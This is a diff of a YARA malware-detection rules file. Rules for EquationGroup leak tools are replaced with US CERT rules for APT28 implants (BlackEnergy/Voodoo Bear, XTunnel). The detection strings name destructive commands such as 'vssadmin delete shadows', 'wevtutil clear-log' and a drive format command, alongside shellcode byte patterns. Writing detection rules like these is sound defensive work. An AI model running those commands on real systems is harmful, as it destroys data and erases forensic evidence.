 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e88f589bed7830a1be81c85c9eb77b7f5c14bef2f0f1b3be6293aa9c5e870278"
-		score = 75
+		logic_hash = "dd072702c59822587d7ede0bc59c5672fbaa9a05595940781554fadb32e109f7"
+		score = 85
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "1ebfc0ce7139db43ddacf4a9af2cb83a407d3d1221931d359ee40588cfd0d02b"
+		tags = ""
 
 	strings:
-		$s1 = "SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\%hs" fullword wide
-		$op1 = { 0f be 37 85 f6 0f 85 4e ff ff ff 45 85 ed 74 21 }
-		$op2 = { 4c 8d 44 24 34 48 8d 57 08 41 8d 49 07 e8 a6 4b }
+		$f1 = {5E 81 EC 04 01 00 00 8B D4 68 04 01 00 00 52 6A 00 FF 57 1C 8B D4
+         33 C9 03 D0 4A 41 3B C8 74 05 80 3A 5C 75 F5 42 81 EC 04 01 00 00 8B
+         DC 52 51 53 68 04 01 00 00 FF 57 20 59 5A 66 C7 04 03 5C 20 56 57 8D
+         3C 03 8B F2 F3 A4 C6 07 00 5F 5E 33 C0 50 68 80 00 00 00 6A 02 50 50
+         68 00 00 00 40 53 FF 57 14 53 8B 4F 4C 8B D6 33 DB 30 1A 42 43 3B D9
+         7C F8 5B 83 EC 04 8B D4 50 6A 00 52 FF 77 4C 8B D6 52 50 FF 57 24 FF
+         57 18}
+		$f2 = {5E 83 EC 1C 8B 45 08 8B 4D 08 03 48 3C 89 4D E4 89 75 EC 8B 45 08
+         2B 45 10 89 45 E8 33 C0 89 45 F4 8B 55 0C 3B 55 F4 0F 86 98 00 00 00
+         8B 45 EC 8B 4D F4 03 48 04 89 4D F4 8B 55 EC 8B 42 04 83 E8 08 D1 E8
+         89 45 F8 8B 4D EC 83 C1 08 89 4D FC}
+		$f3 = {5F 8B DF 83 C3 60 2B 5F 54 89 5C 24 20 8B 44 24 24 25 00 00 FF FF
+         66 8B 18 66 81 FB 4D 5A 74 07 2D 00 00 01 00 EB EF 8B 48 3C 03 C8 66
+         8B 19 66 81 FB 50 45 75 E0 8B E8 8B F7 83 EC 60 8B FC B9 60 00 00 00
+         F3 A4 83 EF 60 6A 0D 59 E8 88 00 00 00 E2 F9 68 6C 33 32 00 68 73 68
+         65 6C 54 FF 57}
+		$a1 = {83 EC 04 60 E9 1E 01 00 00}
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them )
+		$a1 at pe.entry_point or any of ( $f* )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Diba_Target : FILE
+rule SIGNATURE_BASE_IMPLANT_4_V9
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "c6ae85b6-0670-558c-9ce5-64bd5822f35b"
-		date = "2017-04-15"
+		description = "BlackEnergy / Voodoo Bear Implant by APT28"
+		author = "US CERT"
+		id = "a404212a-d9ef-54c1-bbf8-a213ec094f18"
+		date = "2017-02-10"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2724-L2739"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L913-L933"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3ee7a1284e2abd0282606c22b9112bd1af536e5fd48ef27e8d9216da8e1fb1c5"
-		score = 75
-		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "ffff3526ed0d550108e97284523566392af8523bbddb5f212df12ef61eaad3e6"
+		logic_hash = "c0e48bf0839965f9bda9cc475aba5b4934c27c426a8fa4423fb24aa9d792e2e4"
+		score = 85
+		quality = 77
+		tags = ""
 
 	strings:
-		$op1 = { 41 5a 41 59 41 58 5f 5e 5d 5a 59 5b 58 48 83 c4 }
-		$op2 = { f9 48 03 fa 48 33 c0 8a 01 49 03 c1 49 f7 e0 88 }
-		$op3 = { 01 41 f6 e0 49 03 c1 88 01 48 33 }
+		$a = "wevtutil clear-log" ascii wide nocase
+		$b = "vssadmin delete shadows" ascii wide nocase
+		$c = "AGlobal\\23d1a259-88fa-41df-935f-cae523bab8e6" ascii wide nocase
+		$d = "Global\\07fd3ab3-0724-4cfd-8cc2-60c0e450bb9a" ascii wide nocase
+		$openPhysicalDiskOverwriteWithZeros = { 57 55 33 C9 51 8B C3 99 57 52
+         50 E8 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 83 C4 10 84 C0 75 21 33 C0 89
+         44 24 10 89 44 24 14 6A 01 8B C7 99 8D 4C 24 14 51 52 50 56 FF 15 ??
+         ?? ?? ?? 85 C0 74 0B 83 C3 01 81 FB 00 01 00 00 7C B6 }
+		$f = {83 c4 0c 53 53 6a 03 53 6a 03 68 00 00 00 c0}
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them )
+		($a and $b ) or $c or $d or ( $openPhysicalDiskOverwriteWithZeros and $f )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Dsz_Implant : FILE
+rule SIGNATURE_BASE_IMPLANT_4_V10 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "febc8654-7dc3-5c8b-a53c-f8d7dc29b14b"
-		date = "2017-04-15"
+		description = "BlackEnergy / Voodoo Bear Implant by APT28"
+		author = "US CERT"
+		id = "75c266ca-a27f-5ffe-a438-c35bbacfa70c"
+		date = "2017-02-10"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2741-L2755"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L935-L966"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3d76131a42aed642a8c54076544488a8d24ec16416469813324541d72e30101b"
-		score = 75
-		quality = 85
+		logic_hash = "f22fd45eb77ff1a8202f4bd0d0c43787c8184300e96aff021e13371ae7bd5553"
+		score = 85
+		quality = 81
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "fbe103fac45abe4e3638055a3cac5e7009166f626cf2d3049fb46f3b53c1057f"
-		hash2 = "ad1dddd11b664b7c3ad6108178a8dade0a6d9795358c4a7cedbe789c62016670"
 
 	strings:
-		$s1 = "%02u:%02u:%02u.%03u-%4u: " fullword ascii
+		$ = {A1B05C72}
+		$ = {EB3D0384}
+		$ = {6F45594E}
+		$ = {71815A4E}
+		$ = {D5B03E72}
+		$ = {6B43594E}
+		$ = {F572993D}
+		$ = {665D9DC0}
+		$ = {0BE7A75A}
+		$ = {F37443C5}
+		$ = {A2A474BB}
+		$ = {97DEEC67}
+		$ = {7E0CB078}
+		$ = {9C9678BF}
+		$ = {4A37A149}
+		$ = {8667416B}
+		$ = {0A375BA4}
+		$ = {DC505A8D}
+		$ = {02F1F808}
+		$ = {2C819712}
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them )
+		uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3c ) ) == 0x4550 and 15 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Genkey : FILE
+rule SIGNATURE_BASE_IMPLANT_4_V11 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "54e15017-a2f7-5135-af88-b13ea5866c5f"
-		date = "2017-04-15"
+		description = "BlackEnergy / Voodoo Bear Implant by APT28"
+		author = "US CERT"
+		id = "e5fb0843-20f7-56a0-8eea-0db7cef7f610"
+		date = "2017-02-10"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2757-L2770"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L968-L985"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "cdaa33645d0ea614891fc0579937e983b8b4f6c4830191518dc8272791dcc8df"
-		score = 75
+		logic_hash = "7bdeddc4334ed6557175b5eefc78d69283d6c91f98970bd0cfe6365b3ab477f4"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "b6f100b21da4f7e3927b03b8b5f0c595703b769d5698c835972ca0c81699ff71"
 
 	strings:
-		$x1 = "* PrivateEncrypt -> PublicDecrypt FAILED" fullword ascii
+		$ = "/c format %c: /Y /X /FS:NTFS"
+		$ = ".exe.sys.drv.doc.docx.xls.xlsx.mdb.ppt.pptx.xml.jpg.jpeg.ini.inf.ttf" wide
+		$ = ".dll.exe.xml.ttf.nfo.fon.ini.cfg.boot.jar" wide
+		$ = ".crt.bin.exe.db.dbf.pdf.djvu.doc.docx.xls.xlsx.jar.ppt.pptx.tib.vhd.iso.lib.mdb.accdb.sql.mdf.xml.rtf.ini.cf g.boot.txt.rar.msi.zip.jpg.bmp.jpeg.tiff" wide
+		$tempfilename = "%ls_%ls_%ls_%d.~tmp" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 80KB and all of them )
+		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and 2 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Wmi_Implant : FILE
+rule SIGNATURE_BASE_IMPLANT_4_V13 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "e058d2cc-b963-55bc-9bdd-468f64fe8e6f"
-		date = "2017-04-15"
+		description = "BlackEnergy / Voodoo Bear Implant by APT28"
+		author = "US CERT"
+		id = "e96a7d9f-1840-542f-9a9b-95e74377f234"
+		date = "2017-02-10"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2772-L2785"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L1011-L1032"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "69754b6f26292aa1a457c71d079d934ce75794624c38e9d19c84ceb77a5fb26d"
-		score = 75
+		logic_hash = "576c07c44105d2a38ca715d366f68058b2b3118f25e91d2d3e2d20e932fc9453"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "de08d6c382faaae2b4b41b448b26d82d04a8f25375c712c12013cb0fac3bc704"
 
 	strings:
-		$x1 = "SELECT ProcessId,Description,ExecutablePath FROM Win32_Process" fullword ascii
+		$XMLDOM1 = {81 BF 33 29 36 7B D2 11 B2 0E 00 C0 4F 98 3E 60}
+		$XMLDOM2 = {90 BF 33 29 36 7B D2 11 B2 0E 00 C0 4F 98 3E 60}
+		$XMLPARSE = {8B 06 [0-2] 8D 55 ?C 52 FF 75 08 [0-2] 50 FF 91 04 01 00 00
+         66 83 7D ?C FF 75 3? 8B 06 [0-2] 8D 55 F? 52 50 [0-2] FF 51 30 85 C0
+         78 2?}
+		$EXP1 = "DispatchCommand"
+		$EXP2 = "DispatchEvent"
+		$BDATA = {85 C0 74 1? 0F B7 4? 06 83 C? 28 [0-6] 72 ?? 33 C0 5F 5E 5B 5D
+         C2 08 00 8B 4? 0? 8B 4? 0? 89 01 8B 4? 0C 03 [0-2] EB E?}
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 50KB and all of them )
+		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Clocksvc : FILE
+rule SIGNATURE_BASE_IMPLANT_5_V1
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "ec0e90a5-1359-55e5-9165-494f90431247"
-		date = "2017-04-15"
+		description = "XTunnel Implant by APT28"
+		author = "US CERT"
+		id = "dee08753-3465-5bf2-acd5-aa6cc80aba3c"
+		date = "2017-02-10"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2787-L2807"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L1034-L1051"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "04cdd8e4ca9df0231ca66caa8083eff1fe0834cdedc4360fce0a934970a6d162"
-		score = 75
+		logic_hash = "d94192d408036bf02052dc5145b78fea61323810b2abdbba64c65e1f6387ea42"
+		score = 85
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "c1bcd04b41c6b574a5c9367b777efc8b95fe6cc4e526978b7e8e09214337fac1"
+		tags = ""
 
 	strings:
-		$x1 = "~debl00l.tmp" fullword ascii
-		$x2 = "\\\\.\\mailslot\\c54321" fullword ascii
-		$x3 = "\\\\.\\mailslot\\c12345" fullword ascii
-		$x4 = "nowMutex" fullword ascii
-		$s1 = "System\\CurrentControlSet\\Services\\MSExchangeIS\\ParametersPrivate" fullword ascii
-		$s2 = "000000005017C31B7C7BCF97EC86019F5026BE85FD1FB192F6F4237B78DB12E7DFFB07748BFF6432B3870681D54BEF44077487044681FB94D17ED04217145B98" ascii
-		$s3 = "00000000E2C9ADBD8F470C7320D28000353813757F58860E90207F8874D2EB49851D3D3115A210DA6475CCFC111DCC05E4910E50071975F61972DCE345E89D88" ascii
+		$hexstr = {2D 00 53 00 69 00 00 00 2D 00 53 00 70 00 00 00 2D 00 55 00
+         70 00 00 00 2D 00 50 00 69 00 00 00 2D 00 50 00 70 00 00 00}
+		$UDPMSG1 = "error 2005 recv from server UDP - %d\x0a"
+		$TPSMSG1 = "error 2004 send to TPS - %d\x0a"
+		$TPSMSG2 = "error 2003 recv from TPS - %d\x0a"
+		$UDPMSG2 = "error 2002 send to server UDP - %d\x0a"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and ( 1 of ( $x* ) or 2 of ( $s* ) ) )
+		any of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Xxxridearea : FILE
+rule SIGNATURE_BASE_IMPLANT_5_V2
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "2475778b-1246-5471-b305-a946c253c50c"
-		date = "2017-04-15"
+		description = "XTunnel Implant by APT28"
+		author = "US CERT"
+		id = "40f60306-41ee-5a18-84e2-cf479a6bc849"
+		date = "2017-02-10"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2809-L2825"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L1053-L1192"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4d2eeabbb3bb27f46232fe0a43f0ecda9f3589dbe6b08fd4f8aac14f6d12090b"
-		score = 75
-		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "214b0de83b04afdd6ad05567825b69663121eda9e804daff9f2da5554ade77c6"
+		logic_hash = "43e3df19ecd2068636b92c7a5c0399b22f8fa478e3e1562f392e78c5a268a1e5"
+		score = 85
+		quality = 60
+		tags = ""
 
 	strings:
-		$x1 = "USAGE: %s -i InputFile -o OutputFile [-f FunctionOrdinal] [-a FunctionArgument] [-t ThreadOption]" fullword ascii
-		$x2 = "The output payload \"%s\" has a size of %d-bytes." fullword ascii
-		$x3 = "ERROR: fwrite(%s) failed on ucPayload" fullword ascii
-		$x4 = "Load and execute implant within the existing thread" fullword ascii
+		$key0 = { 987AB999FE0924A2DF0A412B14E26093746FCDF9BA31DC05536892C33B116AD3 }
+		$key1 = { 8B236C892D902B0C9A6D37AE4F9842C3070FBDC14099C6930158563C6AC00FF5 }
+		$key2 = { E47B7F110CAA1DA617545567EC972AF3A6E7B4E6807B7981D3CFBD3D8FCC3373 }
+		$key3 = { 48B284545CA1FA74F64FDBE2E605D68CED8A726D05EBEFD9BAAC164A7949BDC1 }
+		$key4 = { FB421558E30FCCD95FA7BC45AC92D2991C44072230F6FBEAA211341B5BF2DC56 }
+		$key5 = { 34F1AE17017AF16021ADA5CE3F77675BBC6E7DEC6478D6078A0B22E5FDFF3B31 }
+		$key6 = { F0EA48F164395186E6F754256EBB812A2AFE168E77ED9501F8B8E6F5B72126A7 }
+		$key7 = { 0B6E9970A8EAF68EE14AB45005357A2F3391BEAA7E53AB760B916BC2B3916ABE }
+		$key8 = { FF032EA7ED2436CF6EEA1F741F99A3522A61FDA8B5A81EC03A8983ED1AEDAB1A }
+		$key9 = { F0DAC1DDFEF7AC6DE1CBE1006584538FE650389BF8565B32E0DE1FFACBCB14BB }
+		$key10 = { A5D699A3CD4510AF11F1AF767602055C523DF74B94527D74319D6EFC6883B80D }
+		$key11 = { 5951B02696C1D5A7B2851D28872384DA607B25F4CEA268FF3FD7FBA75AB3B4B3 }
+		$key12 = { 0465D99B26AF42D8346001BB838595E301BAD8CF5D40CE9C17C944717DF82481 }
+		$key13 = { 5DFE1C83AD5F5CE1BF5D9C42E23225E3ECFDB2493E80E6554A2AC7C722EB4880 }
+		$key14 = { E9650396C45F7783BC14C59F46EA8232E8357C26B5627BFF8C42C6AE2E0F2E17 }
+		$key15 = { 7432AE389125BB4E3980ED7F6A6FB252A42E785A90F4591C3620CA642FF97CA3 }
+		$key16 = { 2B2ADBBC4F960A8916F7088067BAD30BE84B65783FBF9476DF5FDA0E5856B183 }
+		$key17 = { 808C3FD0224A59384161B8A81C8BB404D7197D16D8118CB77067C5C8BD764B3E }
+		$key18 = { 028B0E24D5675C16C815BFE4A073E9778C668E65771A1CE881E2B03F58FC7D5B }
+		$key19 = { 878B7F5CF2DC72BAF1319F91A4880931EE979665B1B24D3394FE72EDFAEF4881 }
+		$key20 = { 7AC7DD6CA34F269481C526254D2F563BC6ECA1779FEEAA33EC1C20E60B686785 }
+		$key21 = { 3044F1D394186815DD8E3A2BBD9166837D07FA1CF6A550E2C170C9CDD9305209 }
+		$key22 = { 7544DC095C441E39D258648FE9CB1267D20D83C8B2D3AB734474401DA4932619 }
+		$key23 = { D702223347406C1999D1A9829CBBE96EC86D377A40E2EE84562EA1FAC1C71498 }
+		$key24 = { CA36CB1177382A1009D392A58F7C1357E94AD2292CC0AE82EE4F7DB0179148E1 }
+		$key25 = { C714F23E4C1C4E55F0E1FA7F5D0DD64658A86F84681D07576D840784154F65DC }
+		$key26 = { 63571BAF736904634AFEE2A70CB9ED64615DE8CA7AEF21E773286B8877D065DB }
+		$key27 = { 27808A9BE98FFE348DE1DB999AC9FDFB26E6C5A0D5E688490EF3D186C43661EB }
+		$key28 = { B6EB86A07A85D40866AFA100789FFB9E85C13F5AA7C7A3B6BA753C7EAB9D6A62 }
+		$key29 = { 88F0020375D60BDB85ACDBFE4BD79CD098DB2B3FA2CEF55D4331DBEFCE455157 }
+		$key30 = { 36535AAB296587AE1162AC5D39492DD1245811C72706246A38FF590645AA5D7B }
+		$key31 = { FDB726261CADD52E10818B49CAB81BEF112CB63832DAA26AD9FC711EA6CE99A4 }
+		$key32 = { 86C0CAA26D9FD07D215BC7EB14E2DA250E905D406AFFAB44FB1C62A2EAFC4670 }
+		$key33 = { BC101329B0E3A7D13F6EBC535097785E27D59E92D449D6D06538725034B8C0F0 }
+		$key34 = { C8D31A78B7C149F62F06497F9DC1DDC4967B566AC52C3A2A65AC7A99643B8A2D }
+		$key35 = { 0EA4A5C565EFBB94F5041392C5F0565B6BADC630D9005B3EADD5D81110623E1F }
+		$key36 = { 06E4E46BD3A0FFC8A4125A6A02B0C56D5D8B9E378CF97539CE4D4ADFAF89FEB5 }
+		$key37 = { 6DE22040821F0827316291331256A170E23FA76E381CA7066AF1E5197AE3CFE7 }
+		$key38 = { C6EF27480F2F6F40910074A45715143954BBA78CD74E92413F785BBA5B2AA121 }
+		$key39 = { 19C96A28F8D9698ADADD2E31F2426A46FD11D2D45F64169EDC7158389BFA59B4 }
+		$key40 = { C3C3DDBB9D4645772373A815B5125BB2232D8782919D206E0E79A6A973FF5D36 }
+		$key41 = { C33AF1608037D7A3AA7FB860911312B4409936D236564044CFE6ED42E54B78A8 }
+		$key42 = { 856A0806A1DFA94B5E62ABEF75BEA3B657D9888E30C8D2FFAEC042930BBA3C90 }
+		$key43 = { 244496C524401182A2BC72177A15CDD2EF55601F1D321ECBF2605FFD1B9B8E3F }
+		$key44 = { DF24050364168606D2F81E4D0DEB1FFC417F1B5EB13A2AA49A89A1B5242FF503 }
+		$key45 = { 54FA07B8108DBFE285DD2F92C84E8F09CDAA687FE492237F1BC4343FF4294248 }
+		$key46 = { 23490033D6BF165B9C45EE65947D6E6127D6E00C68038B83C8BFC2BCE905040C }
+		$key47 = { 4E044025C45680609B6EC52FEB3491130A711F7375AAF63D69B9F952BEFD5F0C }
+		$key48 = { 019F31C5F5B2269020EBC00C1F511F2AC23E9D37E89374514C6DA40A6A03176C }
+		$key49 = { A2483197FA57271B43E7276238468CFB8429326CBDA7BD091461147F642BEB06 }
+		$key50 = { 731C9D6E74C589B7ACB019E5F6A6E07ACF12E68CB9A396CE05AA4D69D5387048 }
+		$key51 = { 540DB6C8D23F7F7FEF9964E53F445F0E56459B10E931DEEEDB2B57B063C7F8B7 }
+		$key52 = { D5AF80A7EEFF26DE988AC3D7CE23E62568813551B2133F8D3E973DA15E355833 }
+		$key53 = { E4D8DBD3D801B1708C74485A972E7F00AFB45161C791EE05282BA68660FFBA45 }
+		$key54 = { D79518AF96C920223D687DD596FCD545B126A678B7947EDFBF24661F232064FB }
+		$key55 = { B57CAA4B45CA6E8332EB58C8E72D0D9853B3110B478FEA06B35026D7708AD225 }
+		$key56 = { 077C714C47DFCF79CA2742B1544F4AA8035BB34AEA9D519DEE77745E01468408 }
+		$key57 = { C3F5550AD424839E4CC54FA015994818F4FB62DE99B37C872AF0E52C376934FA }
+		$key58 = { 5E890432AE87D0FA4D209A62B9E37AAEDEDC8C779008FEBAF9E4E6304D1B2AAC }
+		$key59 = { A42EDE52B5AF4C02CFE76488CADE36A8BBC3204BCB1E05C402ECF450071EFCAB }
+		$key60 = { 4CDAFE02894A04583169E1FB4717A402DAC44DA6E2536AE53F5F35467D31F1CA }
+		$key61 = { 0BEFCC953AD0ED6B39CE6781E60B83C0CFD166B124D1966330CBA9ADFC9A7708 }
+		$key62 = { 8A439DC4148A2F4D5996CE3FA152FF702366224737B8AA6784531480ED8C8877 }
+		$key63 = { CF253BE3B06B310901FF48A351471374AD35BBE4EE654B72B860F2A6EC7B1DBB }
+		$key64 = { A0599F50C4D059C5CFA16821E97C9596B1517B9FB6C6116F260415127F32CE1F }
+		$key65 = { 8B6D704F3DC9150C6B7D2D54F9C3EAAB14654ACA2C5C3952604E65DF8133FE0C }
+		$key66 = { A06E5CDD3871E9A3EE17F7E8DAE193EE47DDB87339F2C599402A78C15D77CEFD }
+		$key67 = { E52ADA1D9BC4C089DBB771B59904A3E0E25B531B4D18B58E432D4FA0A41D9E8A }
+		$key68 = { 4778A7E23C686C171FDDCCB8E26F98C4CBEBDF180494A647C2F6E7661385F05B }
+		$key69 = { FE983D3A00A9521F871ED8698E702D595C0C7160A118A7630E8EC92114BA7C12 }
+		$key70 = { 52BA4C52639E71EABD49534BBA80A4168D15762E2D1D913BAB5A5DBF14D9D166 }
+		$key71 = { 931EB8F7BC2AE1797335C42DB56843427EB970ABD601E7825C4441701D13D7B1 }
+		$key72 = { 318FA8EDB989672DBE2B5A74949EB6125727BD2E28A4B084E8F1F50604CCB735 }
+		$key73 = { 5B5F2315E88A42A7B59C1B493AD15B92F819C021BD70A5A6619AAC6666639BC2 }
+		$key74 = { C2BED7AA481951FEB56C47F03EA38236BC425779B2FD1F1397CB79FE2E15C0F0 }
+		$key75 = { D3979B1CB0EC1A655961559704D7CDC019253ACB2259DFB92558B7536D774441 }
+		$key76 = { 0EDF5DBECB772424D879BBDD51899D6AAED736D0311589566D41A9DBB8ED1CC7 }
+		$key77 = { CC798598F0A9BCC82378A5740143DEAF1A147F4B2908A197494B7202388EC905 }
+		$key78 = { 074E9DF7F859BF1BD1658FD2A86D81C282000EAB09AF4252FAB45433421D3849 }
+		$key79 = { 6CD540642E007F00650ED20D7B54CFFD54DDA95D8DEBB087A004BAE222F22C8E }
+		$key80 = { C76CF2F66C71F6D17FC8DEFA1CAEF8718BA1CE188C7EA02C835A0FA54D3B3314 }
+		$key81 = { A7250A149600E515C9C40FE5720756FDA8251635A3B661261070CB5DABFE7253 }
+		$key82 = { 237C67B97D4CCE4610DE2B82E582808EA796C34A4C24715C953CBA403B2C935E }
+		$key83 = { A8FA182547E66B57C497DAAA195A38C0F0FB0A3C1F7B98B4B852F5F37E885127 }
+		$key84 = { 83694CCA50B821144FFBBE6855F62845F1328111AE1AC5666CBA59EB43AA12C6 }
+		$key85 = { 145E906416B17865AD37CD022DF5481F28C930D6E3F53C50B0953BF33F4DB953 }
+		$key86 = { AB49B7C2FA3027A767F5AA94EAF2B312BBE3E89FD924EF89B92A7CF977354C22 }
+		$key87 = { 7E04E478340C209B01CA2FEBBCE3FE77C6E6169F0B0528C42FA4BDA6D90AC957 }
+		$key88 = { 0EADD042B9F0DDBABA0CA676EFA4EDB68A045595097E5A392217DFFC21A8532F }
+		$key89 = { 5623710F134ECACD5B70434A1431009E3556343ED48E77F6A557F2C7FF46F655 }
+		$key90 = { 6968657DB62F4A119F8E5CB3BF5C51F4B285328613AA7DB9016F8000B576561F }
+		$key91 = { DEBB9C95EAE6A68974023C335F8D2711135A98260415DF05845F053AD65B59B4 }
+		$key92 = { 16F54900DBF08950F2C5835153AB636605FB8C09106C0E94CB13CEA16F275685 }
+		$key93 = { 1C9F86F88F0F4882D5CBD32876368E7B311A84418692D652A6A4F315CC499AE8 }
+		$key94 = { E920E0783028FA05F4CE2D6A04BBE636D56A775CFD4DAEA3F2A1B8BEEB52A6D4 }
+		$key95 = { 73874CA3AF47A8A315D50E1990F44F655EC7C15B146FFE0611B6C4FC096BD07C }
+		$key96 = { F21C1FA163C745789C53922C47E191A5A85301BDC2FFC3D3B688CFBFF39F3BE5 }
+		$key97 = { BC5A861F21CB98BD1E2AE9650B7A0BB4CD0C71900B3463C1BC3380AFD2BB948E }
+		$key98 = { 151BAE36E646F30570DC6A7B57752F2481A0B48DD5184E914BCF411D8AD5ACA0 }
+		$key99 = { F05AD6D7A0CADC10A6468BFDBCBB223D5BD6CA30EE19C239E8035772D80312C9 }
+		$key100 = { 5DE9A0FDB37C0D59C298577E5379BCAF4F86DF3E9FA17787A4CEFA7DD10C462E }
+		$key101 = { F5E62BA862380224D159A324D25FD321E5B35F8554D70CF9A506767713BCA508 }
